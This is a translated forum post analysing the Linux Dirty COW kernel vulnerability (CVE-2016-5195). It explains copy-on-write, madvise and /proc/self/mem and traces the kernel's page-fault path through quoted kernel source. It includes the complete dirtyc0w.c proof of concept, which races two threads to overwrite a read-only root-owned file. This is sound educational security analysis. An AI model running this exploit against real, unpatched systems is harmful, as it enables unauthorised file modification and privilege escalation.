[Original] Linux kernel CVE-2016-5195 (Dirty COW): analysis of how the vulnerability works

Roland_

Posted: 2020-12-11 18:44

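Environment: Ubuntu 16.04, kernel version 4.15.0-45-generic

The Tsinghua mirror is fast!

The build finished quickly.

At first the file contains aaaaaa.

The content was overwritten successfully, so the vulnerability is present.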

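Before going into the details of the vulnerability, a few concepts need to be clear.

P1 and P2 are two processes, and P2 is created by P1 calling fork(). At this point P1 and P2 actually share the same memory. A copy is made only when that shared memory is modified.

This design is based on the following considerations:

1. The child process usually calls one of the exec() family of functions to do its actual work. (A process wants to run another program. Since calling fork is the only way to create a new process, the process first calls fork to create a copy of itself, and then one of the copies, usually the child, calls exec to replace itself with the new program. This is the typical usage in programs such as shells.) A characteristic of the exec family is that on success, control transfers directly to the entry point of the new program (for example, the most common technique in glibc pwn: hijacking __malloc_hook to jump to a one_gadget that calls execve and spawns a shell).

2. fork() really only creates a copy of the parent with a different pid. If all of the parent's data were copied into a new space for the child at this point, the copy would be wasted, because the exec functions replace the current process's address space outright. This calls for an optimization.

This is where the COW (copy-on-write) mechanism comes in.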

Suppose there is a process P1 that creates a new process P2, and then P1 modifies page 3.
The figures below show what happens before and after process P1 modifies page 3.

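Prototype: int madvise(void *addr, size_t length, int advice);

It tells the kernel that the user virtual memory in the range that starts at addr and is length bytes long should follow a particular usage pattern.

The advice argument can take the following values:

With MADV_DONTNEED, this system call tells the kernel that the memory from addr to addr+length will not be used in the near future. The kernel frees that memory to save space, and the corresponding page table entries are cleared.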

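1. First we create a file foo whose permissions are read-only.

2. We open it with O_RDONLY, which returns the file descriptor f, and store the status of that descriptor in the st structure (of type struct stat).

3. Next, mmap maps the file's contents into user space as a private copy-on-write mapping. The arguments have the following meanings:

4. Start two threads: madviseThread and procselfmemThread.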

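procselfmemThread takes as its argument the string we want to write: m0000000.

First it opens /proc/self/mem with O_RDWR (for the current process, /proc/self/mem is the content of the process's memory, so modifying this file amounts to modifying the process's memory directly). But if you test it, you will find:

This is because regions that are not properly mapped cannot be read; memory content can be read only when the read offset falls inside a mapped region. So lseek is needed to set the position of the memory write. Its prototype is:

In the PoC we move the position to the address returned by mmap (that is, where the file is mapped). The SEEK_SET argument tells the system that offset is the new read/write position. The thread then performs 100000000 writes in an attempt to change the content of this memory (which was mapped with read permission only).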

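madviseThread is simple: it calls madvise 100000000 times, marking the range from addr to addr+100 of the mmap'ed region as MADV_DONTNEED.

These two threads run in a race with each other.

After the explanation above, it should be roughly clear what the PoC is doing.

Dirty COW lives up to its name: dirty (the dirty bit) and COW (copy-on-write).

Next we analyze the details of the race.

The call flow for write(f,str,strlen(str)) is as follows:

At the bottom, mem_rw is called. Here the file structure corresponds to /proc/self/mem, buf is the user-space content to be written, count is its size, and ppos is the offset.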

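First, mem_rw gets a pointer to the mm_struct from file->private_data.

mm_struct is defined as follows:

It describes all the information about a process's memory address space in Linux.

Its relationship to task_struct is as follows:

The system maintains a task_struct (process descriptor) for every process. task_struct records all of the process's context, including the memory descriptor mm_struct, whose fields abstract the process's address space.

With the vma structures added:

Several important fields:

mem_rw first allocates a new page and then enters access_remote_vm.

The call chain get_user_pages -> get_user_pages_locked -> __get_user_pages occurs because the write system call runs get_user_pages in the kernel to obtain the memory page that is to be written.

__get_user_pages is as follows:

It has several key points.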

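The first time follow_page_mask is called it returns NULL, because the lookup cannot satisfy the access semantics in foll_flags: the page table entry does not grant write permission to the memory it points to.

Next, faultin_page is called to handle this.

The call flow is as follows:

When it finishes, the page has been faulted in and marked dirty.

In handle_pte_fault(), if the page that triggered the fault is already present in main memory, the fault was usually caused by a write to a read-only page, and COW (copy-on-write) is needed: allocate a new page frame, copy the existing data into it, and then write.

After the second page fault completes, FOLL_WRITE has been cleared to 0, so write permission is no longer required.

So in the normal case the kernel now gets the corresponding page and can write to it directly. That write lands in the mapped memory (the private COW copy) and does not affect the file on disk.

But suppose madviseThread runs at this moment and marks the mmap'ed range MADV_DONTNEED, meaning it will not be used in the near future. The kernel then clears the page table entry for the mapped memory (discarding the page immediately), and a fourth page fault occurs.

When the write is retried, it triggers a page fault and do_fault pages the data in again. Because FOLL_WRITE is now 0, there is no semantic conflict from the write operation as there was the first time; the page is returned normally, and since no COW was performed, the subsequent write is synced back to the read-only file. This results in an unauthorized write.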

Normal flow:

Vulnerable flow:

https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails

Copy on Write

https://blog.csdn.net/qq_26768741/article/details/54375524

mm_struct

https://www.cnblogs.com/wanpengcoder/p/11761063.html

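Linux paging: a detailed look at how the paging mechanism is implemented

Linux memory management: page fault

Analysis of the user-space page fault handler pte_handle_fault(), part 2: copy-on-write

KSM (Kernel Samepage Merging)

A brief introduction to how the different page fault cases are handled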

sudo wget https://mirror.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.4.tar.xz

make bzImage -j4

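MADV_ACCESS_DEFAULT
This flag resets the kernel's expected access pattern for the specified range to the default.

MADV_ACCESS_LWP
This flag tells the kernel that the next LWP to touch the specified address range is the LWP that will access the range most often. The kernel allocates memory and other resources for this range and the LWP accordingly.

MADV_ACCESS_MANY
This flag advises the kernel that many processes or LWPs will access the specified address range randomly across the system. The kernel allocates memory and other resources for this range accordingly.

(The three MADV_ACCESS_* flags above come from the Solaris madvise documentation; Linux does not define them.)

MADV_DONTNEED
Do not expect access in the near future. (For the time being, the application is finished with the given range, so the kernel can free resources associated with it.)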

/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
/*
You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
> This is achieved by racing the madvise(MADV_DONTNEED) system call
> while having the page of the executable mmapped in memory.
*/
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
}

void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
/*
You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
>  The in the wild exploit we are aware of doesn't work on Red Hat
>  Enterprise Linux 5 and 6 out of the box because on one side of
>  the race it writes to /proc/self/mem, but /proc/self/mem is not
>  writable on Red Hat Enterprise Linux 5 and 6.
*/
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
/*
You have to reset the file pointer to the memory position.
*/
    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
}

int main(int argc,char *argv[])
{
/*
You have to pass two arguments. File and Contents.
*/
  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;
/*
You have to open the file in read only mode.
*/
  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];
/*
You have to use MAP_PRIVATE for copy-on-write mapping.
> Create a private copy-on-write mapping.  Updates to the
> mapping are not visible to other processes mapping the same
> file, and are not carried through to the underlying file.  It
> is unspecified whether changes made to the file after the
> mmap() call are visible in the mapped region.
*/
/*
You have to open with PROT_READ.
*/
  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);
/*
You have to do it on two threads.
*/
  pthread_create(&pth1,NULL,madviseThread,argv[1]);
  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
/*
You have to wait for the threads to finish.
*/
  pthread_join(pth1,NULL);
  pthread_join(pth2,NULL);
  return 0;
}

struct stat64 {
    unsigned long long    st_dev;
    unsigned char    __pad0[4];

    unsigned long    __st_ino;

    unsigned int    st_mode;
    unsigned int    st_nlink;

    unsigned long    st_uid;
    unsigned long    st_gid;

    unsigned long long    st_rdev;
    unsigned char    __pad3[4];

    long long    st_size;
    unsigned long    st_blksize;

    /* Number 512-byte blocks allocated. */
    unsigned long long    st_blocks;

    unsigned long    st_atime;
    unsigned long    st_atime_nsec;

    unsigned long    st_mtime;
    unsigned int    st_mtime_nsec;

    unsigned long    st_ctime;
    unsigned long    st_ctime_nsec;

    unsigned long long    st_ino;
};

map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);

// prototype
void *mmap(void *addr, size_t length, int prot, int flags,
           int fd, off_t offset);

root@ubuntu:~/linux-4.4-env# cat /proc/66310/mem

cat: /proc/66310/mem: Input/output error

off_t lseek(int fd, off_t offset, int whence);

__get_free_pages+14
mem_rw.isra+69
mem_write+27
__vfs_write+55
vfs_write+169
sys_write+85

static ssize_t mem_write(struct file *file, const char __user *buf,
             size_t count, loff_t *ppos)
{
    return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

static ssize_t mem_rw(struct file *file, char __user *buf,
            size_t count, loff_t *ppos, int write)            // write=1
{
    struct mm_struct *mm = file->private_data;
    unsigned long addr = *ppos;
    ssize_t copied;
    char *page;

    if (!mm)
        return 0;

    page = (char *)__get_free_page(GFP_TEMPORARY);        // allocate one free page as a temporary buffer and return a pointer to it
    if (!page)
        return -ENOMEM;

    copied = 0;
    // atomic_inc_not_zero(v) increments the atomic_t *v unless it is already zero,
    // and returns true if the increment happened; here it takes a reference on mm->mm_users
    if (!atomic_inc_not_zero(&mm->mm_users))
        goto free;                            // mm_users was 0: free the page and return

    while (count > 0) {                        // loop while there are bytes left
        int this_len = min_t(int, count, PAGE_SIZE);    // compared as int: the smaller of count and PAGE_SIZE

        if (write && copy_from_user(page, buf, this_len)) {    // copy this_len bytes from buf into the newly allocated page
            copied = -EFAULT;
            break;
        }

        this_len = access_remote_vm(mm, addr, page, this_len, write); // write=1
        if (!this_len) {
            if (!copied)
                copied = -EIO;
            break;
        }

        if (!write && copy_to_user(buf, page, this_len)) {
            copied = -EFAULT;
            break;
        }

        buf += this_len;
        addr += this_len;
        copied += this_len;
        count -= this_len;
    }
    *ppos = addr;

    mmput(mm);

free:
    free_page((unsigned long) page);            // free the page allocated above
    return copied;
}

struct mm_struct {

    // head of the linked list of memory regions (VMAs)
    struct vm_area_struct * mmap;       /* list of VMAs */
    // red-black tree of memory regions
    struct rb_root mm_rb;
    // most recently found virtual memory area
    struct vm_area_struct * mmap_cache; /* last find_vma result */

    // function that searches the process address space for a usable address range
    unsigned long (*get_unmapped_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);

    unsigned long (*get_unmapped_exec_area) (struct file *filp,
                unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);

    // method called when a memory region is released
    void (*unmap_area) (struct mm_struct *mm, unsigned long addr);

    // linear address of the first allocated file memory mapping
    unsigned long mmap_base;        /* base of mmap area */

    unsigned long task_size;        /* size of task vm space */
    /*
     * RHEL6 special for bug 790921: this same variable can mean
     * two different things. If sysctl_unmap_area_factor is zero,
     * this means the largest hole below free_area_cache. If the
     * sysctl is set to a positive value, this variable is used
     * to count how much memory has been munmapped from this process
     * since the last time free_area_cache was reset back to mmap_base.
     * This is ugly, but necessary to preserve kABI.
     */
    unsigned long cached_hole_size;

    // address from which the kernel searches the process address space for free linear addresses
    unsigned long free_area_cache;      /* first hole of size cached_hole_size or larger */

    // pointer to the page directory
    pgd_t * pgd;

    // number of users sharing this address space
    atomic_t mm_users;          /* How many users with user space? */

    // primary usage counter of the memory descriptor; reference counted, 0 means no user remains
    atomic_t mm_count;          /* How many references to "struct mm_struct" (users count as 1) */

    // number of memory regions
    int map_count;              /* number of VMAs */

    struct rw_semaphore mmap_sem;

    // lock protecting the task's page tables and reference counts
    spinlock_t page_table_lock;     /* Protects page tables and some counters */

    // list of mm_struct structures; the first member is the initial mm_struct (init_mm)
    struct list_head mmlist;        /* List of maybe swapped mm's.  These are globally strung
                         * together off init_mm.mmlist, and are protected
                         * by mmlist_lock
                         */

    /* Special counters, in some configurations protected by the
     * page_table_lock, in other configurations by being atomic.
     */

    mm_counter_t _file_rss;
    mm_counter_t _anon_rss;
    mm_counter_t _swap_usage;

    // high-water mark of pages owned by the process
    unsigned long hiwater_rss;  /* High-watermark of RSS usage */
    // high-water mark of pages in the process's memory regions
    unsigned long hiwater_vm;   /* High-water virtual memory usage */

    // size of the process address space, pages locked against swapping, pages in shared file mappings, pages in executable mappings
    unsigned long total_vm, locked_vm, shared_vm, exec_vm;
    // pages in the user-mode stack
    unsigned long stack_vm, reserved_vm, def_flags, nr_ptes;
    // bounds of the code segment and data segment
    unsigned long start_code, end_code, start_data, end_data;
    // heap and stack
    unsigned long start_brk, brk, start_stack;
    // start and end addresses of the command-line arguments and of the environment variables
    unsigned long arg_start, arg_end, env_start, env_end;

    unsigned long saved_auxv[AT_VECTOR_SIZE]; /* for /proc/PID/auxv */

    struct linux_binfmt *binfmt;

    cpumask_t cpu_vm_mask;

    /* Architecture-specific MM context */
    mm_context_t context;

    /* Swap token stuff */
    /*
     * Last value of global fault stamp as seen by this process.
     * In other words, this value gives an indication of how long
     * it has been since this task got the token.
     * Look at mm/thrash.c
     */
    unsigned int faultstamp;
    unsigned int token_priority;
    unsigned int last_interval;

    // default access flags of the memory regions
    unsigned long flags; /* Must use atomic bitops to access the bits */

    struct core_state *core_state; /* coredumping support */
#ifdef CONFIG_AIO
    spinlock_t      ioctx_lock;
    struct hlist_head   ioctx_list;
#endif
#ifdef CONFIG_MM_OWNER
    /*
     * "owner" points to a task that is regarded as the canonical
     * user/owner of this mm. All of the following must be true in
     * order for it to be changed:
     *
     * current == mm->owner
     * current->mm != mm
     * new_owner->mm == mm
     * new_owner->alloc_lock is held
     */
    struct task_struct *owner;
#endif

#ifdef CONFIG_PROC_FS
    /* store ref to file /proc/<pid>/exe symlink points to */
    struct file *exe_file;
    unsigned long num_exe_file_vmas;
#endif
#ifdef CONFIG_MMU_NOTIFIER
    struct mmu_notifier_mm *mmu_notifier_mm;
#endif
#ifdef CONFIG_TRANSPARENT_HUGEPAGE
    pgtable_t pmd_huge_pte; /* protected by page_table_lock */
#endif
    /* reserved for Red Hat */
#ifdef __GENKSYMS__
    unsigned long rh_reserved[2];
#else
    /* How many tasks sharing this mm are OOM_DISABLE */
    union {
        unsigned long rh_reserved_aux;
        atomic_t oom_disable_count;
    };

    /* base of lib map area (ASCII armour) */
    unsigned long shlib_base;
#endif
};

/**
 * access_remote_vm - access another process' address space
 * @mm:        the mm_struct of the target address space
 * @addr:    start address to access
 * @buf:    source or destination buffer
 * @len:    number of bytes to transfer
 * @write:    whether the access is a write
 *
 * The caller must hold a reference on @mm.
 */
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
        void *buf, int len, int write)
{
    return __access_remote_vm(NULL, mm, addr, buf, len, write);
}

/*
 * Access another process' address space as given in mm.  If non-NULL, use the
 * given task for page fault accounting.
 */
static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long addr, void *buf, int len, int write)
{
    struct vm_area_struct *vma;
    void *old_buf = buf;

    down_read(&mm->mmap_sem);
    /* ignore errors, just check how much was successfully transferred */
    while (len) {
        int bytes, ret, offset;
        void *maddr;
        struct page *page = NULL;

        ret = get_user_pages(tsk, mm, addr, 1,
                write, 1, &page, &vma);

        if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
            break;
#else
            /*
             * Check if this is a VM_IO | VM_PFNMAP VMA, which
             * we can access using slightly different code.
             */
            vma = find_vma(mm, addr);
            if (!vma || vma->vm_start > addr)
                break;
            if (vma->vm_ops && vma->vm_ops->access)
                ret = vma->vm_ops->access(vma, addr, buf,
                              len, write);
            if (ret <= 0)
                break;
            bytes = ret;
#endif
        } else {
            bytes = len;
            offset = addr & (PAGE_SIZE-1);
            if (bytes > PAGE_SIZE-offset)
                bytes = PAGE_SIZE-offset;

            maddr = kmap(page);
            if (write) {
                copy_to_user_page(vma, page, addr,
                          maddr + offset, buf, bytes);
                set_page_dirty_lock(page);
            } else {
                copy_from_user_page(vma, page, addr,
                            buf, maddr + offset, bytes);
            }
            kunmap(page);
            page_cache_release(page);
        }
        len -= bytes;
        buf += bytes;
        addr += bytes;
    }
    up_read(&mm->mmap_sem);

    return buf - old_buf;
}

Last edited by Roland_ on 2021-1-13 13:19.

Latest replies (1)
K1ose (#2, 2021-11-21 19:35): In mm_struct it should be mm_count rather than mm_counter, although it is not a big problem.